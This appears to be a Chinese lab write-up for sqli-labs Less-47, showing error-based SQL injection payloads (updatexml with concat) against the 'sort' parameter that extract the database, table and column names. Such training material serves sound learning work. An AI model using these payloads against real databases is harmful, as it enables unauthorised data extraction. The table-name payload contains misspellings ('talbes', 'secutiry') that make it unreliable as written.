sqli-labs-Less-47

SQLI-LAPS 实验记录

Less-47

这一关与之前的关卡类似,只是闭合的方式不同。

首先我们在Password这一点输入Payload如下:

sql 复制代码
?sort=1

结果如图所示,页面以第一列为顺序,返回了数据库当中的数据。


之后,我们可以使用报错注入的方式,对数据库名、表名等内容进行注入。

php 复制代码
?sort=1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+

结果如图所示,返回了数据库名。

后续爆出数据库的表名、列名等方式如下:

  • 爆出表名:
php 复制代码
?sort=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.talbes where table_schema='secutiry'),0x7e),1)--+
  • 爆出列名:
php 复制代码
?sort=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+
相关推荐
不驚1 小时前
软考信息安全工程师-第七章《访问控制技术原理与应用》
计算机网络·网络安全·信息安全·软考·信息安全工程师
山川绿水7 小时前
bugku——PWN——overflow2
人工智能·web安全·网络安全
2301_781571427 小时前
Golang格式化输出占位符都有什么_Golang fmt占位符教程【通俗】
jvm·数据库·python
养肥胖虎7 小时前
RAG学习笔记(3):区分数据库检索与RAG的使用场景
数据库·ai·rag
_ku_ku_8 小时前
数据库系统原理 · 数据库应用开发 · 自学总结
数据库
长谷深风1118 小时前
索引提速秘籍【个人八股】
mysql·b+树·索引·索引设计原则·存储引擎优化·索引维护成本·字段选择策略
No8g攻城狮8 小时前
【人大金仓】wsl2+ubuntu22.04安装人大金仓数据库V9
java·数据库·spring boot·非关系型数据库
山峰哥9 小时前
SQL慢查询调优实战:从全表扫描到索引覆盖的完整复盘
前端·数据库·sql·性能优化
Irene19919 小时前
在 WSL 中下载安装 MySQL,连接到 SQLyog(MySQL 安装在 WSL vs Windows 本地对比)
mysql·wsl
代码中介商9 小时前
Redis入门:5大数据类型全解析
数据库·redis·缓存